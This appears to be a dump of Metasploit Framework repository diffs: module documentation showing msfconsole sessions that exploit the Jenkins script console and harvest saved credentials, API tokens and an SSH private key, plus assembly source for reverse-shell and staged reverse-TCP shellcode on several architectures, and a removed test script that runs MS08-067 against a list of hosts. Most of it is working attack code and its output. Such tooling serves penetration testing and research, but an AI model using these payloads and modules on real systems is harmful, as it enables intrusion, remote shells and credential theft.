Check if the jenkins instance you have a shell on is running inside a Docker container.
|
||||
|
||||
```
|
||||
msf > use exploit/multi/http/jenkins_script_console
|
||||
msf exploit(jenkins_script_console) > set API_TOKEN bc3dbc5c328733cc826c15772e6eaef5
|
||||
API_TOKEN => bc3dbc5c328733cc826c15772e6eaef5
|
||||
msf exploit(jenkins_script_console) > set RHOST 10.0.0.40
|
||||
RHOST => 10.0.0.40
|
||||
msf exploit(jenkins_script_console) > set RPORT 8080
|
||||
RPORT => 8080
|
||||
msf exploit(jenkins_script_console) > set TARGETURI /
|
||||
TARGETURI => /
|
||||
msf exploit(jenkins_script_console) > set TARGET 1
|
||||
TARGET => 1
|
||||
msf exploit(jenkins_script_console) > set USERNAME user
|
||||
USERNAME => user
|
||||
msf exploit(jenkins_script_console) > run
|
||||
|
||||
[*] Started reverse TCP handler on 10.0.0.49:4444
|
||||
[*] Checking access to the script console
|
||||
[*] Authenticating with token...
|
||||
[*] Using CSRF token: 'b83d12171ba5248100f1de20e6472067' (Jenkins-Crumb style)
|
||||
[*] 10.0.0.40:8080 - Sending Linux stager...
|
||||
[*] Sending stage (826840 bytes) to 10.0.0.40
|
||||
[*] Meterpreter session 1 opened (10.0.0.49:4444 -> 10.0.0.40:54404) at 2017-08-16 20:56:23 -0500
|
||||
[!] Deleting /tmp/aFdmPcC payload file
|
||||
|
||||
meterpreter > run post/linux/gather/checkcontainer
|
||||
|
||||
[+] This appears to be a 'Docker' container
|
||||
meterpreter >
|
||||
```
|
||||
Detect a LXC container
|
||||
```
|
||||
meterpreter > run post/linux/gather/checkcontainer
|
||||
|
||||
[+] This appears to be a 'LXC' container
|
||||
meterpreter >
|
||||
```
|
||||
Detect a systemd nspawn container
|
||||
```
|
||||
meterpreter > run post/linux/gather/checkcontainer
|
||||
|
||||
[+] This appears to be a 'systemd nspawn' container
|
||||
meterpreter >
|
||||
```
|
||||
Detect nothing
|
||||
```
|
||||
meterpreter > run post/linux/gather/checkcontainer
|
||||
|
||||
[*] This does not appear to be a container
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,206 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Official Source:
|
||||
[Jenkins](https://jenkins.io/download/)
|
||||
|
||||
This module has been verified against:
|
||||
|
||||
1. Jenkins 2.67 on Ubuntu 16.04 in Docker
|
||||
1. Jenkins 2.67 on Windows 7 SP 1
|
||||
1. Jenkins 2.60.1
|
||||
1. Jenkins 1.56
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Set up Jenkins to obtain a shell (use Docker for quick setup)
|
||||
1. Run `docker run -p 8080:8080 -p 50000:50000 jenkins`
|
||||
1. Use the default setup and install "suggested plugins"
|
||||
1. Create new user admin, add a user or credential (via Manage Jenkins)
|
||||
1. Start msfconsole
|
||||
1. We'll use the `jenkins_script_console` module to quickly gain a shell
|
||||
1. Do: ```use exploit/multi/http/jenkins_script_console```
|
||||
1. Do: ```set RHOST 172.17.0.1```
|
||||
1. Do: ```set RPORT 8080```
|
||||
1. Do: ```set TARGETURI /```
|
||||
1. Do: ```set USERNAME admin```
|
||||
1. Do: ```set PASSWORD or set API_TOKEN```
|
||||
1. Do: ```set TARGET 1```
|
||||
1. Do: ```set PAYLOAD linux/x86/meterpreter/reverse_tcp```
|
||||
1. Do: ```set LHOST 192.168.56.105```
|
||||
1. Do: ```exploit -j```
|
||||
1. Do: ```use post/multi/gather/jenkins_gather```
|
||||
1. Do: ```set SESSION 1```
|
||||
1. Do: ```run```
|
||||
1. You should see the saved credentials output
|
||||
|
||||
## Options
|
||||
|
||||
**SEARCH_JOBS**
|
||||
|
||||
This option searches through the `jobs` folder for interesting
|
||||
keywords but obviously increases runtime on larger instances.
|
||||
|
||||
**STORE_LOOT**
|
||||
|
||||
This option saves interesting files and loot to disk. If set to
|
||||
false will simply output data to console.
|
||||
|
||||
## Scenarios
|
||||
|
||||
**Jenkins on Windows**
|
||||
|
||||
```
|
||||
msf post(jenkins_gather) > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
18 shell x86/linux 192.168.56.105:4444 -> 192.168.56.1:58828 (172.17.0.1)
|
||||
20 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 192.168.56.105:4444 -> 192.168.56.1:58974 (172.17.0.2)
|
||||
21 meterpreter x86/windows NT AUTHORITY\SYSTEM @ kali 192.168.56.105:4444 -> 192.168.56.101:50427 (192.168.56.101)
|
||||
23 shell x86/windows 192.168.56.105:4444 -> 192.168.56.101:50793 (192.168.56.101)
|
||||
|
||||
msf post(jenkins_gather) > info
|
||||
|
||||
Name: Jenkins Credential Collector
|
||||
Module: post/multi/gather/jenkins_gather
|
||||
Platform: Linux, Windows
|
||||
Arch:
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
thesubtlety
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SEARCH_JOBS true no Search through job history logs for interesting keywords. Increases runtime.
|
||||
SESSION 17 yes The session to run this module on.
|
||||
STORE_LOOT true no Store files in loot (will simply output file to console if set to false).
|
||||
|
||||
Description:
|
||||
This module can be used to extract saved Jenkins credentials, user
|
||||
tokens, SSH keys, and secrets. Interesting files will be stored in
|
||||
loot along with combined csv output.
|
||||
|
||||
|
||||
msf post(jenkins_gather) > run
|
||||
|
||||
[*] Searching for Jenkins directory... This could take some time...
|
||||
[*] Found Jenkins installation at C:\Program Files\Jenkins
|
||||
[+] Credentials found - Username: user1 Password: Password123456
|
||||
[+] SSH Key found! ID: 83c6a18f-6b35-420a-8534-cc505c3347b5 Passphrase: secretpassphrase123 Username: sshkey1 Description: interesting description
|
||||
[+] Job Info found - Job Name: User: testpass Password: secretpass123
|
||||
[+] Job Info found - Job Name: User: testpass Password: ohwowosupersecret
|
||||
[+] Node Info found - Name: test Host: hostnode1.lab.local Port: 22 CredID: 972fc428-dd7c-46ea-a119-be78ae0866ad
|
||||
[+] API Token found - Username: admin Token: 8a114e0fa48c1a489c39b98e94c986c8
|
||||
[+] API Token found - Username: useruseruser Token: 6810c3f6ccca939ac2a8b8ac4b9de012
|
||||
[*] Searching through job history for interesting bits...
|
||||
[+] Job Log truffles:
|
||||
C:\Program Files\Jenkins\jobs\asdf\builds\4\log:C:\Program Files\Jenkins\workspace\asdf>echo "secret is secret"
|
||||
C:\Program Files\Jenkins\jobs\asdf\builds\4\log:"secret is secret"
|
||||
...
|
||||
C:\Program Files\Jenkins\jobs\asdf\lastSuccessful\log:C:\Program Files\Jenkins\workspace\asdf>echo "secret is secret"
|
||||
C:\Program Files\Jenkins\jobs\asdf\lastSuccessful\log:"secret is secret"
|
||||
[+]
|
||||
Creds
|
||||
=====
|
||||
|
||||
Username Password Description
|
||||
-------- -------- -----------
|
||||
|
||||
testpass secretpass123
|
||||
testpass ohwowosupersecret
|
||||
user1 Password123456
|
||||
|
||||
[+]
|
||||
API Keys
|
||||
========
|
||||
|
||||
Username API Tokens
|
||||
-------- ----------
|
||||
admin 8a114e0fa48c1a489c39b98e94c986c8
|
||||
useruseruser 6810c3f6ccca939ac2a8b8ac4b9de012
|
||||
|
||||
[+]
|
||||
Nodes
|
||||
=====
|
||||
|
||||
Node Name Hostname Port Description Cred Id
|
||||
--------- -------- ---- ----------- -------
|
||||
test hostnode1.lab.local 22 testtesttest 972fc428-dd7c-46ea-a119-be78ae0866ad
|
||||
|
||||
[+] SSH Key
|
||||
[*] ID: 83c6a18f-6b35-420a-8534-cc505c3347b5
|
||||
[*] Description: interesting description
|
||||
[*] Passphrase: secretpassphrase123
|
||||
[*] Username: sshkey1
|
||||
[*]
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
MIIEowIBAAKCAQEAuTfL0ijR0JDLTQC092ZolnkTJGRi7YQInK/K1ZFDFc44JOSU
|
||||
...snip...
|
||||
7Ad+Ja6+51ECnXJIFKPj7binB6/C10YVqHh4KON3DeA6ZA7ZpUko
|
||||
-----END RSA PRIVATE KEY-----
|
||||
|
||||
[*] Post module execution completed
|
||||
|
||||
|
||||
```
|
||||
|
||||
**Jenkins 2.67 on Ubuntu 16.04**
|
||||
|
||||
```
|
||||
msf post(jenkins_gather) > set session 20
|
||||
session => 18
|
||||
msf post(jenkins_gather) > info
|
||||
|
||||
Name: Jenkins Credential Collector
|
||||
Module: post/multi/gather/jenkins_gather
|
||||
Platform: Linux, Windows
|
||||
Arch:
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
thesubtlety
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SEARCH_JOBS true no Search through job history logs for interesting keywords. Increases runtime.
|
||||
SESSION 17 yes The session to run this module on.
|
||||
STORE_LOOT true no Store files in loot (will simply output file to console if set to false).
|
||||
|
||||
Description:
|
||||
This module can be used to extract saved Jenkins credentials, user
|
||||
tokens, SSH keys, and secrets. Interesting files will be stored in
|
||||
loot along with combined csv output.
|
||||
|
||||
msf post(jenkins_gather) > run
|
||||
|
||||
[*] Searching for Jenkins directory... This could take some time...
|
||||
[*] Found Jenkins installation at /root/.jenkins
|
||||
[+] Credentials found - Username: thanksforthefish Password: whatagreatbook
|
||||
[+] API Token found - Username: user1 Token: 859e1d6ee6ab85804434fa5395ab962d
|
||||
[+] API Token found - Username: admin Token: 9da706c125a4b5a4c19b1f799723175c
|
||||
[*] Searching through job history for interesting bits...
|
||||
[+]
|
||||
Creds
|
||||
=====
|
||||
|
||||
Username Password Description
|
||||
-------- -------- -----------
|
||||
thanksforthefish whatagreatbook
|
||||
|
||||
[+]
|
||||
API Keys
|
||||
========
|
||||
|
||||
Username API Tokens
|
||||
-------- ----------
|
||||
admin 9da706c125a4b5a4c19b1f799723175c
|
||||
user1 859e1d6ee6ab85804434fa5395ab962d
|
||||
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -1,4 +1,5 @@
|
|||
## Creating A Testing Environment
|
||||
|
||||
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
|
||||
|
||||
This module has been tested against:
|
||||
|
@ -23,6 +24,7 @@ This module was not tested against, but may work against:
|
|||
|
||||
### Windows 10 x64
|
||||
|
||||
```
|
||||
msf exploit(handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on <MSF_IP>:4567
|
||||
|
@ -71,3 +73,4 @@ This module was not tested against, but may work against:
|
|||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
```
|
|
@ -56,7 +56,7 @@ set PAYLOAD windows/meterpreter/reverse_https
|
|||
set LHOST 192.168.1.101
|
||||
set LPORT 13002
|
||||
set ExitOnSession false
|
||||
set AutoRunScript multi_console_command -rc /home/user/auto.rc
|
||||
set AutoRunScript multi_console_command -r /home/user/auto.rc
|
||||
exploit -j
|
||||
```
|
||||
|
||||
|
|
|
@ -0,0 +1,72 @@
|
|||
.equ SYS_SOCKET, 0xc6
|
||||
.equ SYS_CONNECT, 0xcb
|
||||
.equ SYS_DUP3, 0x18
|
||||
.equ SYS_EXECVE, 0xdd
|
||||
.equ SYS_EXIT, 0x5d
|
||||
|
||||
.equ AF_INET, 0x2
|
||||
.equ SOCK_STREAM, 0x1
|
||||
|
||||
.equ STDIN, 0x0
|
||||
.equ STDOUT, 0x1
|
||||
.equ STDERR, 0x2
|
||||
|
||||
.equ IP, 0x0100007f
|
||||
.equ PORT, 0x5C11
|
||||
|
||||
_start:
|
||||
// sockfd = socket(AF_INET, SOCK_STREAM, 0)
|
||||
mov x0, AF_INET
|
||||
mov x1, SOCK_STREAM
|
||||
mov x2, 0
|
||||
mov x8, SYS_SOCKET
|
||||
svc 0
|
||||
mov x3, x0
|
||||
|
||||
// connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
|
||||
adr x1, sockaddr
|
||||
mov x2, 0x10
|
||||
mov x8, SYS_CONNECT
|
||||
svc 0
|
||||
cbnz w0, exit
|
||||
|
||||
// dup3(sockfd, STDIN, 0) ...
|
||||
mov x0, x3
|
||||
mov x2, 0
|
||||
mov x1, STDIN
|
||||
mov x8, SYS_DUP3
|
||||
svc 0
|
||||
mov x1, STDOUT
|
||||
mov x8, SYS_DUP3
|
||||
svc 0
|
||||
mov x1, STDERR
|
||||
mov x8, SYS_DUP3
|
||||
svc 0
|
||||
|
||||
// execve('/system/bin/sh', NULL, NULL)
|
||||
adr x0, shell
|
||||
mov x2, 0
|
||||
str x0, [sp, 0]
|
||||
str x2, [sp, 8]
|
||||
mov x1, sp
|
||||
mov x8, SYS_EXECVE
|
||||
svc 0
|
||||
|
||||
exit:
|
||||
mov x0, 0
|
||||
mov x8, SYS_EXIT
|
||||
svc 0
|
||||
|
||||
.balign 4
|
||||
sockaddr:
|
||||
.short AF_INET
|
||||
.short PORT
|
||||
.word IP
|
||||
|
||||
shell:
|
||||
.word 0x00000000
|
||||
.word 0x00000000
|
||||
.word 0x00000000
|
||||
.word 0x00000000
|
||||
end:
|
||||
|
|
@ -0,0 +1,44 @@
|
|||
.equ SYS_DUP3, 0x18
|
||||
.equ SYS_EXECVE, 0xdd
|
||||
.equ SYS_EXIT, 0x5d
|
||||
|
||||
.equ STDIN, 0x0
|
||||
.equ STDOUT, 0x1
|
||||
.equ STDERR, 0x2
|
||||
|
||||
_start:
|
||||
/* dup3(sockfd, STDIN, 0) ... */
|
||||
mov x0, x12
|
||||
mov x2, 0
|
||||
mov x1, STDIN
|
||||
mov x8, SYS_DUP3
|
||||
svc 0
|
||||
mov x1, STDOUT
|
||||
mov x8, SYS_DUP3
|
||||
svc 0
|
||||
mov x1, STDERR
|
||||
mov x8, SYS_DUP3
|
||||
svc 0
|
||||
|
||||
/* execve('/system/bin/sh', NULL, NULL) */
|
||||
adr x0, shell
|
||||
mov x2, 0
|
||||
str x0, [sp, 0]
|
||||
str x2, [sp, 8]
|
||||
mov x1, sp
|
||||
mov x8, SYS_EXECVE
|
||||
svc 0
|
||||
|
||||
exit:
|
||||
mov x0, 0
|
||||
mov x8, SYS_EXIT
|
||||
svc 0
|
||||
|
||||
.balign 4
|
||||
shell:
|
||||
.word 0x00000000
|
||||
.word 0x00000000
|
||||
.word 0x00000000
|
||||
.word 0x00000000
|
||||
end:
|
||||
|
|
@ -0,0 +1,94 @@
|
|||
.equ SYS_SOCKET, 0xc6
|
||||
.equ SYS_CONNECT, 0xcb
|
||||
.equ SYS_READ, 0x3f
|
||||
.equ SYS_MMAP, 0xde
|
||||
.equ SYS_EXIT, 0x5d
|
||||
|
||||
.equ AF_INET, 0x2
|
||||
.equ SOCK_STREAM, 0x1
|
||||
|
||||
.equ STDIN, 0x0
|
||||
.equ STDOUT, 0x1
|
||||
.equ STDERR, 0x2
|
||||
|
||||
.equ IP, 0x0100007f
|
||||
.equ PORT, 0x5C11
|
||||
|
||||
start:
|
||||
/* sockfd = socket(AF_INET, SOCK_STREAM, 0) */
|
||||
mov x0, AF_INET
|
||||
mov x1, SOCK_STREAM
|
||||
mov x2, 0
|
||||
mov x8, SYS_SOCKET
|
||||
svc 0
|
||||
mov x12, x0
|
||||
|
||||
/* connect(sockfd, (struct sockaddr *)&server, sockaddr_len) */
|
||||
adr x1, sockaddr
|
||||
mov x2, 0x10
|
||||
mov x8, SYS_CONNECT
|
||||
svc 0
|
||||
cbnz w0, failed
|
||||
|
||||
/* read(sockfd, buf='x1', nbytes=4) */
|
||||
mov x0, x12
|
||||
sub sp, sp, #16
|
||||
mov x1, sp
|
||||
mov x2, #4
|
||||
mov x8, SYS_READ
|
||||
svc 0
|
||||
cbz w0, failed
|
||||
|
||||
ldr x2, [sp,#0]
|
||||
|
||||
/* Page-align, assume <4GB */
|
||||
lsr x2, x2, #12
|
||||
add x2, x2, #1
|
||||
lsl x2, x2, #12
|
||||
|
||||
/* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */
|
||||
mov x0, xzr
|
||||
mov x1, x2
|
||||
mov x2, #7
|
||||
mov x3, #34
|
||||
mov x4, xzr
|
||||
mov x5, xzr
|
||||
/* call mmap() */
|
||||
movi x8, SYS_MMAP
|
||||
svc 0
|
||||
|
||||
/* Grab the saved size, save the address */
|
||||
ldr x4, [sp]
|
||||
|
||||
/* Save the memory address */
|
||||
str x0, [sp]
|
||||
|
||||
/* Read in all of the data */
|
||||
mov x3, x0
|
||||
|
||||
read_loop:
|
||||
/* read(sockfd, buf='x3', nbytes='x4') */
|
||||
mov x0, x12
|
||||
mov x1, x3
|
||||
mov x2, x4
|
||||
mov x8, SYS_READ
|
||||
svc 0
|
||||
add x3, x3, x0
|
||||
subs x4, x4, x0
|
||||
bne read_loop
|
||||
|
||||
/* Go to shellcode */
|
||||
ldr x30, [sp]
|
||||
ret
|
||||
|
||||
failed:
|
||||
mov x0, 0
|
||||
mov x8, SYS_EXIT
|
||||
svc 0
|
||||
|
||||
.balign 4
|
||||
sockaddr:
|
||||
.short AF_INET
|
||||
.short PORT
|
||||
.word IP
|
||||
|
|
@ -33,11 +33,13 @@ BITS 32
|
|||
GLOBAL _start
|
||||
|
||||
_start:
|
||||
push 0x5 ; retry counter
|
||||
pop esi
|
||||
|
||||
create_socket:
|
||||
xor ebx, ebx
|
||||
mul ebx
|
||||
|
||||
; int socket(int domain, int type, int protocol);
|
||||
socket:
|
||||
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
|
||||
inc ebx ; 1 = SYS_SOCKET
|
||||
push ebx ; type = 1 = SOCK_STREAM
|
||||
|
@ -47,13 +49,15 @@ socket:
|
|||
int 0x80
|
||||
xchg eax, edi
|
||||
|
||||
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
connect:
|
||||
pop ebx
|
||||
set_address:
|
||||
pop ebx ; set ebx back to zero
|
||||
push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
|
||||
push 0xbfbf0002 ; addr->sin_port = 49087
|
||||
; addr->sin_family = 2 = AF_INET
|
||||
mov ecx, esp ; ecx = addr
|
||||
|
||||
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
try_connect:
|
||||
push byte 0x66 ; __NR_socketcall
|
||||
pop eax
|
||||
push eax ; addrlen
|
||||
|
@ -62,6 +66,22 @@ connect:
|
|||
mov ecx, esp ; socketcall args
|
||||
inc ebx ; 3 = SYS_CONNECT
|
||||
int 0x80
|
||||
test eax, eax
|
||||
jns mprotect
|
||||
|
||||
handle_failure:
|
||||
push 0xa2
|
||||
pop eax
|
||||
push 0x0 ; sleep_nanoseconds
|
||||
push 0x5 ; sleep_seconds
|
||||
mov ebx, esp
|
||||
xor ecx, ecx
|
||||
int 0x80 ; sys_nanosleep
|
||||
test eax, eax
|
||||
js failed
|
||||
dec esi
|
||||
jnz create_socket
|
||||
jmp failed
|
||||
|
||||
%ifndef USE_SINGLE_STAGE
|
||||
|
||||
|
@ -74,6 +94,8 @@ mprotect:
|
|||
shl ebx, 12
|
||||
mov al, 0x7d ; __NR_mprotect
|
||||
int 0x80
|
||||
test eax, eax
|
||||
js failed
|
||||
|
||||
; ssize_t read(int fd, void *buf, size_t count);
|
||||
recv:
|
||||
|
@ -83,6 +105,13 @@ recv:
|
|||
mov dh, 0xc ; count = 0xc00
|
||||
mov al, 0x3 ; __NR_read
|
||||
int 0x80
|
||||
test eax, eax
|
||||
js failed
|
||||
jmp ecx
|
||||
|
||||
failed:
|
||||
mov eax, 0x1
|
||||
mov ebx, 0x1 ; set exit status to 1
|
||||
int 0x80 ; sys_exit
|
||||
|
||||
%endif
|
||||
|
|
|
@ -26,50 +26,57 @@
|
|||
.globl _start
|
||||
_start:
|
||||
xor %rdi, %rdi
|
||||
pushq $0x9
|
||||
push $0x9
|
||||
pop %rax
|
||||
cltd
|
||||
cdq
|
||||
mov $0x10, %dh
|
||||
mov %rdx, %rsi
|
||||
xor %r9, %r9
|
||||
pushq $0x22
|
||||
push $0x22
|
||||
pop %r10
|
||||
mov $0x7, %dl
|
||||
syscall
|
||||
syscall # mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
|
||||
test %rax, %rax
|
||||
js failed
|
||||
# mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
|
||||
|
||||
push %rsi
|
||||
push %rax
|
||||
pushq $0x29
|
||||
push $0x29
|
||||
pop %rax
|
||||
cltd
|
||||
pushq $0x2
|
||||
cdq
|
||||
push $0x2
|
||||
pop %rdi
|
||||
pushq $0x1
|
||||
push $0x1
|
||||
pop %rsi
|
||||
syscall
|
||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||
syscall # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||
test %rax, %rax
|
||||
js failed
|
||||
|
||||
xchg %rax, %rdi
|
||||
movabs $0x100007fb3150002, %rcx
|
||||
push %rcx
|
||||
mov %rsp, %rsi
|
||||
pushq $0x10
|
||||
push $0x10
|
||||
pop %rdx
|
||||
pushq $0x2a
|
||||
push $0x2a
|
||||
pop %rax
|
||||
syscall
|
||||
# connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
|
||||
syscall # connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
|
||||
test %rax, %rax
|
||||
js failed
|
||||
|
||||
pop %rcx
|
||||
pop %rsi
|
||||
pop %rdx
|
||||
syscall # read(3, "", 4096)
|
||||
jmpq *%rsi
|
||||
test %rax, %rax
|
||||
js failed
|
||||
|
||||
jmpq *%rsi # to stage
|
||||
|
||||
failed:
|
||||
pushq $0x3c
|
||||
push $0x3c
|
||||
pop %rax
|
||||
pushq $0x1
|
||||
push $0x1
|
||||
pop %rdi
|
||||
syscall
|
||||
# exit(1)
|
||||
syscall # exit(1)
|
||||
|
|
|
@ -1,111 +0,0 @@
|
|||
Feature: Help command
|
||||
|
||||
Background:
|
||||
Given I run `msfconsole --defer-module-loads -q -x help -x exit`
|
||||
|
||||
Scenario: The 'help' command's output
|
||||
Then the output should contain:
|
||||
"""
|
||||
Core Commands
|
||||
=============
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
? Help menu
|
||||
banner Display an awesome metasploit banner
|
||||
cd Change the current working directory
|
||||
color Toggle color
|
||||
connect Communicate with a host
|
||||
exit Exit the console
|
||||
get Gets the value of a context-specific variable
|
||||
getg Gets the value of a global variable
|
||||
grep Grep the output of another command
|
||||
help Help menu
|
||||
history Show command history
|
||||
irb Drop into irb scripting mode
|
||||
load Load a framework plugin
|
||||
quit Exit the console
|
||||
route Route traffic through a session
|
||||
save Saves the active datastores
|
||||
sessions Dump session listings and display information about sessions
|
||||
set Sets a context-specific variable to a value
|
||||
setg Sets a global variable to a value
|
||||
sleep Do nothing for the specified number of seconds
|
||||
spool Write console output into a file as well the screen
|
||||
threads View and manipulate background threads
|
||||
unload Unload a framework plugin
|
||||
unset Unsets one or more context-specific variables
|
||||
unsetg Unsets one or more global variables
|
||||
version Show the framework and console library version numbers
|
||||
|
||||
|
||||
Module Commands
|
||||
===============
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
advanced Displays advanced options for one or more modules
|
||||
back Move back from the current context
|
||||
edit Edit the current module with the preferred editor
|
||||
info Displays information about one or more modules
|
||||
loadpath Searches for and loads modules from a path
|
||||
options Displays global options or for one or more modules
|
||||
popm Pops the latest module off the stack and makes it active
|
||||
previous Sets the previously loaded module as the current module
|
||||
pushm Pushes the active or list of modules onto the module stack
|
||||
reload_all Reloads all modules from all defined module paths
|
||||
search Searches module names and descriptions
|
||||
show Displays modules of a given type, or all modules
|
||||
use Selects a module by name
|
||||
|
||||
|
||||
Job Commands
|
||||
============
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
handler Start a payload handler as job
|
||||
jobs Displays and manages jobs
|
||||
kill Kill a job
|
||||
rename_job Rename a job
|
||||
|
||||
|
||||
Resource Script Commands
|
||||
========================
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
makerc Save commands entered since start to a file
|
||||
resource Run the commands stored in a file
|
||||
|
||||
|
||||
Database Backend Commands
|
||||
=========================
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
db_connect Connect to an existing database
|
||||
db_disconnect Disconnect from the current database instance
|
||||
db_export Export a file containing the contents of the database
|
||||
db_import Import a scan result file (filetype will be auto-detected)
|
||||
db_nmap Executes nmap and records the output automatically
|
||||
db_rebuild_cache Rebuilds the database-stored module cache
|
||||
db_status Show the current database status
|
||||
hosts List all hosts in the database
|
||||
loot List all loot in the database
|
||||
notes List all notes in the database
|
||||
services List all services in the database
|
||||
vulns List all vulnerabilities in the database
|
||||
workspace Switch between database workspaces
|
||||
|
||||
|
||||
Credentials Backend Commands
|
||||
============================
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
creds List all credentials in the database
|
||||
|
||||
|
||||
"""
|
||||
|
|
@ -1,48 +0,0 @@
|
|||
@targets @db
|
||||
Feature: MS08-067 netapi
|
||||
|
||||
Background:
|
||||
Given a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
|
||||
Scenario: The MS08-067 should get a session with bind_tcp
|
||||
Given I ready the windows targets
|
||||
Given a file named "ms08-067-bind.rc" with:
|
||||
"""
|
||||
<ruby>
|
||||
self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
|
||||
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
|
||||
payload_name = 'windows/meterpreter/bind_tcp'
|
||||
exploited_hosts = []
|
||||
failed_hosts = []
|
||||
|
||||
hosts.each do |host|
|
||||
print_status("Trying MS08-067 against #{host['ipAddress']}")
|
||||
mod = framework.exploits.create('windows/smb/ms08_067_netapi')
|
||||
mod.datastore['PAYLOAD'] = payload_name
|
||||
mod.datastore['RHOST'] = host['ipAddress']
|
||||
m = mod.exploit_simple(
|
||||
'LocalInput' => nil,
|
||||
'LocalOutput' => nil,
|
||||
'Payload' => payload_name,
|
||||
'RunAsJob' => false
|
||||
)
|
||||
|
||||
sleep(1)
|
||||
|
||||
if m
|
||||
exploited_hosts << host['ipAddress']
|
||||
else
|
||||
failed_hosts << host['ipAddress']
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Exploited hosts: #{exploited_hosts.inspect}")
|
||||
print_status("Failed hosts: #{failed_hosts.inspect}")
|
||||
self.run_single('sessions -K')
|
||||
</ruby>
|
||||
"""
|
||||
When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
|
||||
Then the 'Mdm::Host' table contains the expected targets
|
||||
|
|
@ -1,153 +0,0 @@
|
|||
@boot
|
||||
Feature: `msfconsole` `database.yml`
|
||||
|
||||
In order to connect to the database in `msfconsole`
|
||||
As a user calling `msfconsole` from a terminal
|
||||
I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence):
|
||||
|
||||
1. An explicit argument to the `-y` flag to `msfconsole`
|
||||
2. The MSF_DATABASE_CONFIG environment variable
|
||||
3. The user's `~/.msf4/database.yml`
|
||||
4. `config/database.yml` in the metasploit-framework checkout location.
|
||||
|
||||
Scenario: With all 4 locations, --yaml wins
|
||||
Given a file named "command_line.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: command_line_metasploit_framework_test
|
||||
username: command_line_metasploit_framework_test
|
||||
"""
|
||||
And a file named "msf_database_config.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: environment_metasploit_framework_test
|
||||
username: environment_metasploit_framework_test
|
||||
"""
|
||||
And I set the environment variables to:
|
||||
| variable | value |
|
||||
| MSF_DATABASE_CONFIG | msf_database_config.yml |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And a directory named ".msf4"
|
||||
And I cd to ".msf4"
|
||||
And a file named "database.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: user_metasploit_framework_test
|
||||
username: user_metasploit_framework_test
|
||||
"""
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" exists with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
|
||||
Then the output should contain "command_line_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
|
||||
Given a file named "msf_database_config.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: environment_metasploit_framework_test
|
||||
username: environment_metasploit_framework_test
|
||||
"""
|
||||
And I set the environment variables to:
|
||||
| variable | value |
|
||||
| MSF_DATABASE_CONFIG | msf_database_config.yml |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And a directory named ".msf4"
|
||||
And I cd to ".msf4"
|
||||
And a file named "database.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: user_metasploit_framework_test
|
||||
username: user_metasploit_framework_test
|
||||
"""
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" exists with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
|
||||
Then the output should contain "environment_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
|
||||
Given I unset the environment variables:
|
||||
| variable |
|
||||
